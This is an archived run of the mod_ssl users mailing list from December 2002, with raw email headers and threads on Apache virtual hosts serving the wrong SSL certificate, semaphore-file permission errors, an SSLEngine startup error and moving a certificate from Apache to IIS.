> >    SSLCertificateKeyFile       /usr/local/etc/A.key
> >
> >    DocumentRoot                /webdocs/A
> >
> >    # other sundry virtual host directory stuff here.
> >
> 
> Looks OK...
> 
> >
> >
> >    AddType                     application/x-x509-ca-cert .crt
> >    AddType                     application/x-pkcs7-crl    .crl
> >
> >
> >    ServerName                  B.funkware.com
> >    ServerAdmin                 B@funkware.com
> >    ErrorLog                    logs/B/error_log2
> >    CustomLog                   logs/B/access_log2 combined
> >
> >    SSLEngine on
> >    SSLCertificateFile          /etc/httpd/conf/httpd-cert-3443.cert
> >    SSLCertificateKeyFile       /etc/httpd/conf/httpd-cert-3443.key
> >
> >    DocumentRoot                
> >"/local/private/OpenCA/httpd/htdocs/pub"
> >
> >    # other sundry virtual host directory stuff here.
> >
> >
> 
> Looks OK too...  > 
> 
> >Like i said, when i startup the server, the first cert (A.Cert) is used
> >for both virtual hosts.  Does this seutp look correct?  Is 
> >there something
> >I missed?  
> >
> >Here are a couple more tidbits of info that i've learned...I 
> >don't know if
> >any of it is useful though...
> >
> >  * All the certs and keys are valid.  I've verified it using OpenSSL.
> >  * When I get the root page for  both virtual hosts, i get the proper
> >    page for each server.
> 
> What exactly do you mean here... Do you mean that:
> 
> https://A.funkware.com/ -> /webdocs/A
> https://B.funkware.com/ -> /local/private/OpenCA/httpd/htdocs/pub
> 
> or do you mean via HTTP?

Sorry about that.  I should have been more clear.  Your assumption was
correct:

    https://A.funkware.com/ -> /webdocs/A
    https://B.funkware.com/ -> /local/private/OpenCA/httpd/htdocs/pub

This part of the VirtualHost information is being properly read and used.


> >  * If i change the second "SSLCertificateFile" to a bogus file or
> >    something that doesn't exist, the server will not startup (as
> >    expected).  However, the second cert is still not used.
> 
> As you say, this is normal - missing files or directories cause apache
> to abort during startup, long before any network setup is done.

Sure.  I understand.

> >  * If i change the order (putting the VirtualHost declaration for .33
> >    before .31), the behavior is consistant: the 
> >httpd-cert-3443.cert is
> >    used for both servers.
> 
> I suspect a DNS or routing problem... I notice you have real ".com"
> domain names which implies these sites are available on the internet.
> However, the IP addresses are on the 192.168.0.0 private network. This
> implies that you have a firewall and/or router with network address
> translation between the webserver and the web. Are you sure that, after
> NAT, A.funkware.com resolves to 192.168.7.31 and that B.funkware.com
> resolves to 192.168.7.33?
> 
> I suspect that both FQDNs are resolving to the same internal IP
> address... 

You are correct again that I am working behind a firewall using the
192.168.7/24 network.  Unfortunately, I know that the FQDNs are correct (i
run the DNS).  

For my testing, I am working completely behind the wall, I am running the
client on a machine at 192.168.7.20, and my netmask on all machines is
255.255.255.0, hence all machines are on the same subnet.  There is no NAT
being done on my side of the firewall.

Also, i get the same results if i connect using the IP Address instead of
the hostname.

Here are some more things that I've discovered...

  * The two virtual hosts have their respective error logs going to:
     A -> logs/A/error_log
     B -> logs/b/error_log2

    It just so happens that the DNs for both certificates are not the
    "correct" DNs for the servers:

     A -> CN=*.funkware.com, O=Funkware, c=US
     B -> CN=newx.funkware.com, O=Funkware, c=US

    I know that either of these certs will work properly when used solo.  

    The thing about the improper CN in the DN is that when the server
    starts up, the error log will complain that the DN in the cert is
    improper.  For exmaple, in logs/A/error_log when the "A" cert is used,
    i see: 
    
      [Mon Dec 09 23:04:32 2002] [warn] RSA server certificate
        CommonName (CN) `*.funkware.com' does NOT match server name!?

    The thing i noticed is that BOTH of the error logs for the two
    respective servers complain about the same name.  (The CN in the error
    message for both servers will be the same (either *.funkware.com if
    the "A" Cert is used, or "newx.funkware.com" if the "B" cert is used).

  * If i use the openssl s_client to connect to the respective machines
    (either using DNS or using the IP address), the cert is always the
    same.

Thanks again.  

If there's any more information I can provide, please let me know.

...alex...
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Dec 10 20:43:51 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA24129; Tue, 10 Dec 2002 20:43:09 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from charentes.fr.clara.net id UAA24124; Tue, 10 Dec 2002 20:42:11 +0100 (MET)
From: lsojj@freesurf.fr
Received: from freesurf.fr (jose.freesurf.fr [212.43.206.13])
	by charentes.fr.clara.net (Postfix) with SMTP id 80C0E5AA39
	for ; Tue, 10 Dec 2002 20:42:06 +0100 (CET)
Received: from 81.80.81.130
        (SquirrelMail authenticated user lsojj)
        by jose.freesurf.fr with HTTP;
        Tue, 10 Dec 2002 20:42:06 +0100 (CET)
Message-ID: <1470.81.80.81.130.1039549326.squirrel@jose.freesurf.fr>
Date: Tue, 10 Dec 2002 20:42:06 +0100 (CET)
Subject: apache-ssl or mod-ssl
To: 
X-Priority: 3
Importance: Normal
X-MSMail-Priority: Normal
X-Mailer: SquirrelMail (version 1.2.5)
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: lsojj@freesurf.fr
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

High to th ML,

I got a pb:
I'll work with a compagny which has develloped its own https client, and i
would like to know which ssl could be the answer, apache-ssl or mod-ssl.

The skills of the https clients are the following:
HTTP OVer TLS.
(SSL v3!/TLS)
And the X509 Certificates.

Does anyone have an idea?

PS:Does apache-ssl support TLS? Or there's just modssl wich does.

Thanks.

Laurent .


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Dec 11 02:33:03 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id CAA27415; Wed, 11 Dec 2002 02:32:10 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from deimos.hpl.hp.com id CAA27411; Wed, 11 Dec 2002 02:31:34 +0100 (MET)
Received: from harp.hpl.hp.com (harp.hpl.hp.com [15.4.90.214])
	by deimos.hpl.hp.com (8.9.3 (PHNE_24419)/HPL-PA Relay) with ESMTP id RAA29983
	for ; Tue, 10 Dec 2002 17:31:33 -0800 (PST)
Received: (from hernan@localhost)
	by harp.hpl.hp.com (8.9.3 (PHNE_24419)/8.9.3 HPLabs Workstation) id RAA05072
	for modssl-users@modssl.org; Tue, 10 Dec 2002 17:31:32 -0800 (PST)
X-Authentication-Warning: harp.hpl.hp.com: hernan set sender to hernan2@cello.hpl.hp.com using -f
Date: Tue, 10 Dec 2002 17:31:32 -0800
From: Hernan Laffitte 
To: modssl-users@modssl.org
Subject: hardwiring the semaphores directory
Message-ID: <20021211013132.GB2126@harp.hpl.hp.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.4i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Hernan Laffitte 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello,

I just built mod_ssl  as a DSO library (mod_ssl v2.8.12,
Apache v1.3.27, mm v1.1.3) under HP-UX.

I am having problems when trying to start up mod_ssl as
a non-root user. The Apache/mod_ssl binaries were installed
under /opt/apache (i.e., /opt/apache was the "prefix" parameter
for the Apache "configure" program"). I would like to
use these binaries for several instances of Apache
running on different machines.

However, when I try to start Apache as a regular
user, I get this error:

# /opt/apache/bin/httpd -f /home/hernan/http/conf/httpd.conf 
Ouch! ap_mm_create(1048576, "/opt/apache/logs/httpd.mm.4429") failed
Error: MM: mm:core: failed to open semaphore file (Permission denied): OS: No such file or directory

It seems like somebody (mod_ssl? Apache? MM?) is trying to create
the semaphore files under the Apache prefix. Is there any way
to change this path in real time? (Or at least, to hardwire it
to something else, like /var/opt/apache)

Thanks in advance for any help with this issue.

Best regards,

Hernan



-- 
--
Hernan Laffitte
Systems Administrator, HP Labs / Storage Systems Department
http://www.hpl.hp.com
hernan@hpl.hp.com
tel (650)857-4937 fax (650)857-5548
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Dec 11 15:06:02 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA05995; Wed, 11 Dec 2002 15:05:15 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ns0a.swx.com id PAA05985; Wed, 11 Dec 2002 15:04:59 +0100 (MET)
Received: from gate0a.unix.swx.ch (gate0a [192.168.252.17])
	by ns0a.swx.com (8.12.6/8.12.6) with ESMTP id gBBE4t4O018245
	for ; Wed, 11 Dec 2002 15:04:56 +0100 (MET)
Received: from SOMEXEVS001.ex.ordersx.org (localhost [127.0.0.1])
	by gate0a.unix.swx.ch (8.12.6/8.12.6) with ESMTP id gBBE4tDm009136
	for ; Wed, 11 Dec 2002 15:04:55 +0100 (MET)
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300
Subject: RE: Problem with IP/Port Based (NOT Name Based) virtual hosts.
Date: Wed, 11 Dec 2002 15:04:54 +0100
Message-ID: <484A6CA492BE654395D208B1D8D5393973A5F0@SOMEXEVS001.ex.ordersx.org>
Thread-Topic: Problem with IP/Port Based (NOT Name Based) virtual hosts.
Importance: normal
Thread-Index: AcKgKsUBx4so9+i4T/CO76FWuFZKNwA8zVlw
From: "Boyle Owen" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I don't really understand what can be wrong - your config looks OK and
if the logs and docroots are accurate, I don't see how it can be going
into the wrong VH. Therefore, you must be mistaken about the certificate
files.

Are you sure you don't have symlinks or something funny which could
allow one server to see the other's certs in place of its own?

When you say "gets the wrong cert" do you mean that you get a browser
warning "cert does not match FQDN"?

rgds,

Owen Boyle

>-----Original Message-----
>From: Alex Tang [mailto:altitudespam@funkware.com]
>Sent: Dienstag, 10. Dezember 2002 09:57
>To: modssl-users@modssl.org
>Cc: altitudespam@funkware.com
>Subject: Re: Problem with IP/Port Based (NOT Name Based) virtual hosts.
>
>
>Hi there.  Thanks for the help.  I have some followup comments 
>inline...
>
>
>On Tue, Dec 10, 2002 at 09:04:35AM +0100, Boyle Owen wrote:
>> You must be the first guy to figure this out from the docs! Well done
>> :-)
>
>Ha.  Thanks. :)
>
>> >However, I'm trying to setup my server (apache 2.0.43, OpenSSL
>> >0.9.7-beta5, RH Linux 7.3) to do IP or Port based virtual hosts.  
>> >
>> >It seems that the server will only ever use the first cert 
>declared.  
>> >
>> >I have the following in my httpd.conf (well, technically a 
>> >file included by httpd.conf)
>> >
>> >SSLSessionCache         dbm:/var/cache/mod_ssl/scache
>> >SSLSessionCacheTimeout  300
>> >SSLMutex  file:logs/ssl_mutex
>> >SSLRandomSeed startup builtin
>> >SSLRandomSeed connect builtin
>> >
>> >
>> >    ServerName                  A.funkware.com
>> >    ServerAdmin                 A@funkware.com
>> >    ErrorLog                    logs/A/error_log
>> >    CustomLog                   logs/A/access_log combined
>> >
>> >    SSLEngine on
>> >    SSLCertificateFile          /usr/local/etc/A.Cert
>> >    SSLCertificateKeyFile       /usr/local/etc/A.key
>> >
>> >    DocumentRoot                /webdocs/A
>> >
>> >    # other sundry virtual host directory stuff here.
>> >
>> 
>> Looks OK...
>> 
>> >
>> >
>> >    AddType                     application/x-x509-ca-cert .crt
>> >    AddType                     application/x-pkcs7-crl    .crl
>> >
>> >
>> >    ServerName                  B.funkware.com
>> >    ServerAdmin                 B@funkware.com
>> >    ErrorLog                    logs/B/error_log2
>> >    CustomLog                   logs/B/access_log2 combined
>> >
>> >    SSLEngine on
>> >    SSLCertificateFile          /etc/httpd/conf/httpd-cert-3443.cert
>> >    SSLCertificateKeyFile       /etc/httpd/conf/httpd-cert-3443.key
>> >
>> >    DocumentRoot                
>> >"/local/private/OpenCA/httpd/htdocs/pub"
>> >
>> >    # other sundry virtual host directory stuff here.
>> >
>> >
>> 
>> Looks OK too...  > 
>> 
>> >Like i said, when i startup the server, the first cert 
>(A.Cert) is used
>> >for both virtual hosts.  Does this seutp look correct?  Is 
>> >there something
>> >I missed?  
>> >
>> >Here are a couple more tidbits of info that i've learned...I 
>> >don't know if
>> >any of it is useful though...
>> >
>> >  * All the certs and keys are valid.  I've verified it 
>using OpenSSL.
>> >  * When I get the root page for  both virtual hosts, i get 
>the proper
>> >    page for each server.
>> 
>> What exactly do you mean here... Do you mean that:
>> 
>> https://A.funkware.com/ -> /webdocs/A
>> https://B.funkware.com/ -> /local/private/OpenCA/httpd/htdocs/pub
>> 
>> or do you mean via HTTP?
>
>Sorry about that.  I should have been more clear.  Your assumption was
>correct:
>
>    https://A.funkware.com/ -> /webdocs/A
>    https://B.funkware.com/ -> /local/private/OpenCA/httpd/htdocs/pub
>
>This part of the VirtualHost information is being properly 
>read and used.
>
>
>> >  * If i change the second "SSLCertificateFile" to a bogus file or
>> >    something that doesn't exist, the server will not startup (as
>> >    expected).  However, the second cert is still not used.
>> 
>> As you say, this is normal - missing files or directories 
>cause apache
>> to abort during startup, long before any network setup is done.
>
>Sure.  I understand.
>
>> >  * If i change the order (putting the VirtualHost 
>declaration for .33
>> >    before .31), the behavior is consistant: the 
>> >httpd-cert-3443.cert is
>> >    used for both servers.
>> 
>> I suspect a DNS or routing problem... I notice you have real ".com"
>> domain names which implies these sites are available on the internet.
>> However, the IP addresses are on the 192.168.0.0 private 
>network. This
>> implies that you have a firewall and/or router with network address
>> translation between the webserver and the web. Are you sure 
>that, after
>> NAT, A.funkware.com resolves to 192.168.7.31 and that B.funkware.com
>> resolves to 192.168.7.33?
>> 
>> I suspect that both FQDNs are resolving to the same internal IP
>> address... 
>
>You are correct again that I am working behind a firewall using the
>192.168.7/24 network.  Unfortunately, I know that the FQDNs 
>are correct (i
>run the DNS).  
>
>For my testing, I am working completely behind the wall, I am 
>running the
>client on a machine at 192.168.7.20, and my netmask on all machines is
>255.255.255.0, hence all machines are on the same subnet.  
>There is no NAT
>being done on my side of the firewall.
>
>Also, i get the same results if i connect using the IP Address 
>instead of
>the hostname.
>
>Here are some more things that I've discovered...
>
>  * The two virtual hosts have their respective error logs going to:
>     A -> logs/A/error_log
>     B -> logs/b/error_log2
>
>    It just so happens that the DNs for both certificates are not the
>    "correct" DNs for the servers:
>
>     A -> CN=*.funkware.com, O=Funkware, c=US
>     B -> CN=newx.funkware.com, O=Funkware, c=US
>
>    I know that either of these certs will work properly when 
>used solo.  
>
>    The thing about the improper CN in the DN is that when the server
>    starts up, the error log will complain that the DN in the cert is
>    improper.  For exmaple, in logs/A/error_log when the "A" 
>cert is used,
>    i see: 
>    
>      [Mon Dec 09 23:04:32 2002] [warn] RSA server certificate
>        CommonName (CN) `*.funkware.com' does NOT match server name!?
>
>    The thing i noticed is that BOTH of the error logs for the two
>    respective servers complain about the same name.  (The CN 
>in the error
>    message for both servers will be the same (either *.funkware.com if
>    the "A" Cert is used, or "newx.funkware.com" if the "B" 
>cert is used).
>
>  * If i use the openssl s_client to connect to the respective machines
>    (either using DNS or using the IP address), the cert is always the
>    same.
>
>Thanks again.  
>
>If there's any more information I can provide, please let me know.
>
>...alex...
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>

This message is for the named person's use only. It may contain
confidential, proprietary or legally privileged information. No
confidentiality or privilege is waived or lost by any mistransmission.
If you receive this message in error, please notify the sender urgently
and then immediately delete the message and any copies of it from your
system. Please also immediately destroy any hardcopies of the message.
You must not, directly or indirectly, use, disclose, distribute, print,
or copy any part of this message if you are not the intended recipient.
The sender's company reserves the right to monitor all e-mail
communications through their networks. Any views expressed in this
message are those of the individual sender, except where the message
states otherwise and the sender is authorised to state them to be the
views of the sender's company. 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Dec 11 22:09:16 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA09843; Wed, 11 Dec 2002 22:08:27 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from nextgeneration.speedroad.net id WAA09838; Wed, 11 Dec 2002 22:07:48 +0100 (MET)
Received: (qmail 7960 invoked by uid 1010); 11 Dec 2002 21:07:41 -0000
Received: from freelight.isd.no (HELO ?195.139.232.120?) (195.139.232.120)
  by mail.speedroad.net with SMTP; 11 Dec 2002 21:07:41 -0000
Date: Wed, 11 Dec 2002 22:07:41 +0100
From: Arnvid Karstad 
To: modssl-users@modssl.org
Subject: problems after upgrading mod_ssl and apache..
Organization: Int
Message-Id: <20021211220413.3FD1.ARNVID@karstad.org>
MIME-Version: 1.0
Content-Type: text/plain; charset="US-ASCII"
Content-Transfer-Encoding: 7bit
X-Mailer: Becky! ver. 2.05.06
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Arnvid Karstad 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hiya

Yesterday we upgraded on of our http servers from apache 1.3.26 to
1.3.27 with the equalent version of mod_ssl.

root@nextgeneration:/usr/src/other/php# /usr/local/apache/bin/apachectl startssl
Apache/1.3.27 mod_ssl/2.8.12 (Pass Phrase Dialog)
 Some of your private key files are encrypted for security reasons.
 In order to read them you have to provide us with the pass phrases.
 Server ssl.reroute.set:443 (RSA)
Enter pass phrase:
Ok: Pass Phrase Dialog successful.
/usr/local/apache/bin/apachectl startssl: httpd started

Syntax error on line 524 of /usr/local/apache/conf/httpd.conf:
Invalid command 'SSLEngine', perhaps mis-spelled or defined by a module not included in the server configuration

And then the server dies... anyone know where to start looking..?


Mvh/Best regards,

Arnvid L. Karstad


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Dec 11 22:45:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA10127; Wed, 11 Dec 2002 22:44:30 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from herring.crytech.com id WAA10123; Wed, 11 Dec 2002 22:43:17 +0100 (MET)
Received: (qmail 3412 invoked from network); 11 Dec 2002 21:43:13 -0000
Received: from unknown (HELO croaker) (216.187.147.1)
  by herring.crytech.com with SMTP; 11 Dec 2002 21:43:13 -0000
Message-ID: <02e301c2a15d$f21666a0$1801a8c0@croaker>
From: "Emily Eileen Witcher" 
To: 
Subject: Migrating Apache/ModSSL/OpenSSL certificate to Win2K/IIS 5.0
Date: Wed, 11 Dec 2002 14:40:32 -0700
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1106
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Emily Eileen Witcher" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

We have a 2-year Verisign Secure Site ID running on one of our Apache
servers with ModSSL. The original CSR was generated using OpenSSL software.
Now the site is moving to Windows 2000 / IIS 5.0 (bleah) and I was searching
the web for information regarding how to transfer the certificate between
the two environments. Verisign apparently does not provide support on this
issue; I found some info at Thawte
(http://www.thawte.com/html/SUPPORT/server/apachessl.html) but it appears to
be incomplete. Microsoft's support site doesn't seem to have any word on the
subject either (surprise). So if anyone has a better link than the one I
found, I'd love to hear about it. Thanks so much...

Emily Witcher - emily@crytech.com


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Dec 11 22:52:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA10307; Wed, 11 Dec 2002 22:51:27 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from SOTTMXS01.entrust.com id WAA10303; Wed, 11 Dec 2002 22:51:02 +0100 (MET)
Received: by sottmxs01.entrust.com with Internet Mail Service (5.5.2656.59)
	id ; Wed, 11 Dec 2002 16:50:55 -0500
Message-ID: 
From: Robert Lagana 
To: "'modssl-users@modssl.org'" 
Subject: RE: Migrating Apache/ModSSL/OpenSSL certificate to Win2K/IIS 5.0
Date: Wed, 11 Dec 2002 16:50:54 -0500
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2656.59)
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C2A15F.6175A460"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Robert Lagana 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.

------_=_NextPart_001_01C2A15F.6175A460
Content-Type: text/plain;
	charset="iso-8859-1"

You can take your private key and public key from Apache.. import them into
MS IIS 4.0 as a key pair set. IIS 4 will ask you for the private key and the
public key.
Backup the keypair set as a keypair file (.key) this will contain both the
private key and public key in one .key file. Then go to your MS IIS 5.0
webserver and under directory security.. go through the server certificate
wizard and choose the last option "Import"
The "Import" option is designed for IIS 4.0 .key files.



-----Original Message-----
From: Emily Eileen Witcher [mailto:emily@crytech.com]
Sent: Wednesday, December 11, 2002 4:41 PM
To: modssl-users@modssl.org
Subject: Migrating Apache/ModSSL/OpenSSL certificate to Win2K/IIS 5.0


We have a 2-year Verisign Secure Site ID running on one of our Apache
servers with ModSSL. The original CSR was generated using OpenSSL software.
Now the site is moving to Windows 2000 / IIS 5.0 (bleah) and I was searching
the web for information regarding how to transfer the certificate between
the two environments. Verisign apparently does not provide support on this
issue; I found some info at Thawte
(http://www.thawte.com/html/SUPPORT/server/apachessl.html) but it appears to
be incomplete. Microsoft's support site doesn't seem to have any word on the
subject either (surprise). So if anyone has a better link than the one I
found, I'd love to hear about it. Thanks so much...

Emily Witcher - emily@crytech.com


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

------_=_NextPart_001_01C2A15F.6175A460
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable






RE: Migrating Apache/ModSSL/OpenSSL certificate to Win2K/IIS =
5.0




You can take your private key and public key from =
Apache.. import them into MS IIS 4.0 as a key pair set. IIS 4 will ask =
you for the private key and the public key.



Backup the keypair set as a keypair file (.key) this =
will contain both the private key and public key in one .key file. Then =
go to your MS IIS 5.0 webserver and under directory security.. go =
through the server certificate wizard and choose the last option =
"Import"



The "Import" option is designed for IIS 4.0 =
.key files.








-----Original Message-----

From: Emily Eileen Witcher [mailto:emily@crytech.com]

Sent: Wednesday, December 11, 2002 4:41 PM

To: modssl-users@modssl.org

Subject: Migrating Apache/ModSSL/OpenSSL certificate =
to Win2K/IIS 5.0






We have a 2-year Verisign Secure Site ID running on =
one of our Apache

servers with ModSSL. The original CSR was generated =
using OpenSSL software.

Now the site is moving to Windows 2000 / IIS 5.0 =
(bleah) and I was searching

the web for information regarding how to transfer =
the certificate between

the two environments. Verisign apparently does not =
provide support on this

issue; I found some info at Thawte

(http://www.thawte.com/html/SUPPORT/server/apachessl.ht=
ml) but it appears to

be incomplete. Microsoft's support site doesn't seem =
to have any word on the

subject either (surprise). So if anyone has a better =
link than the one I

found, I'd love to hear about it. Thanks so =
much...




Emily Witcher - emily@crytech.com






_______________________________________________________________=
_______

Apache Interface to OpenSSL =
(mod_ssl)          &nb=
sp;        www.modssl.org

User Support Mailing =
List           &n=
bsp;          =
modssl-users@modssl.org

Automated List =
Manager           =
;            =
;     majordomo@modssl.org





------_=_NextPart_001_01C2A15F.6175A460--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Dec 12 02:04:02 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id CAA12336; Thu, 12 Dec 2002 02:03:10 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from deimos.hpl.hp.com id CAA12332; Thu, 12 Dec 2002 02:02:31 +0100 (MET)
Received: from harp.hpl.hp.com (harp.hpl.hp.com [15.4.90.214])
	by deimos.hpl.hp.com (8.9.3 (PHNE_24419)/HPL-PA Relay) with ESMTP id RAA03738
	for ; Wed, 11 Dec 2002 17:02:30 -0800 (PST)
Received: (from hernan@localhost)
	by harp.hpl.hp.com (8.9.3 (PHNE_24419)/8.9.3 HPLabs Workstation) id RAA04376
	for modssl-users@modssl.org; Wed, 11 Dec 2002 17:02:25 -0800 (PST)
X-Authentication-Warning: harp.hpl.hp.com: hernan set sender to hernan2@cello.hpl.hp.com using -f
Date: Wed, 11 Dec 2002 17:02:25 -0800
From: Hernan Laffitte 
To: modssl-users@modssl.org
Subject: hardwiring the semaphores directory, revisited
Message-ID: <20021212010225.GA2864@harp.hpl.hp.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.4i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Hernan Laffitte 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

After looking at the source code, I realized that the
problem I described in my previous post is related to
the FAQ entry titled:

   "Apache creates files in a directory declared by the internal
   EAPI_MM_CORE_PATH define. ..."

The FAQ entry doesn't mention semaphores or the error
message a badly-defined EAPI_MM_CORE_PATH can cause,
so I missed it on my initial troubleshooting of this
problem.

I think it would be useful to add a couple of sentences to this
entry, something like:

   If you don't have permissions to write to the directory
   pointed by EAPI_MM_CORE_PATH, httpd may fail on startup
   with an error message similar to this:

   Ouch! ap_mm_create(1048576, "/opt/apache/logs/httpd.mm.25669") failed
   Error: MM: mm:core: failed to open semaphore file (Permission
   denied): OS: No such file or directory

This could help people doing a textual search for the error
message. Does this make sense?

Thanks,

Hernan

-- 
--
Hernan Laffitte
Systems Administrator, HP Labs / Storage Systems Department
http://www.hpl.hp.com
hernan@hpl.hp.com
tel (650)857-4937 fax (650)857-5548
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Dec 13 17:56:01 2002
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 569C22AA096; Fri, 13 Dec 2002 17:56:01 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from mail.funkware.com (adsl-63-203-244-18.dsl.snfc21.pacbell.net [63.203.244.18])
	by master.modssl.org (Postfix) with ESMTP id 4AEAC2AA07D
	for ; Fri, 13 Dec 2002 17:55:59 +0100 (CET)
Received: by mail.funkware.com (Postfix, from userid 8490)
	id A5616D1F0; Fri, 13 Dec 2002 08:55:56 -0800 (PST)
Date: Fri, 13 Dec 2002 08:55:56 -0800
From: Alex Tang 
To: modssl-users@modssl.org
Cc: altitudespam@funkware.com
Subject: Re: Problem with IP/Port Based (NOT Name Based) virtual hosts.
Message-ID: <20021213165556.GA24185@funkware.com>
References: <484A6CA492BE654395D208B1D8D5393973A5F0@SOMEXEVS001.ex.ordersx.org>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <484A6CA492BE654395D208B1D8D5393973A5F0@SOMEXEVS001.ex.ordersx.org>
User-Agent: Mutt/1.5.1i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Alex Tang 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Wed, Dec 11, 2002 at 03:04:54PM +0100, Boyle Owen wrote:
> I don't really understand what can be wrong - your config looks OK and
> if the logs and docroots are accurate, I don't see how it can be going
> into the wrong VH. Therefore, you must be mistaken about the certificate
> files.

Thanks again. 

I have checked again, and am positive that the certificate and key files
are correct.

> Are you sure you don't have symlinks or something funny which could
> allow one server to see the other's certs in place of its own?

Nope.  

If i comment one of the VirtualHosts out of the config file, the correct
cert will be used.  For example, if i leave both VH directives in, the
cert for the first declared VH will be used.  If i comment out the first
VH, the cert in the second VH will be used properly. 

> When you say "gets the wrong cert" do you mean that you get a browser
> warning "cert does not match FQDN"?


Mainly i was talking about the server logs.  In the server log, there will
be a message stating that the "ServerName" does not match the CN from the
certificate.  

This isn't a problem that should affect the operation of the server.  I
was only stating it because the log message lists the CN in the
certificate, and i was using that information as proof that the wrong
certificate was being used.  

Perhaps this is a problem with my installation of Apache or mod_ssl.  I am
running RH73 and have re-compiled Apache 2.0.43 and mod_ssl from SRPMS.  

Perhaps i'll just go back to using the standard distribution of apache
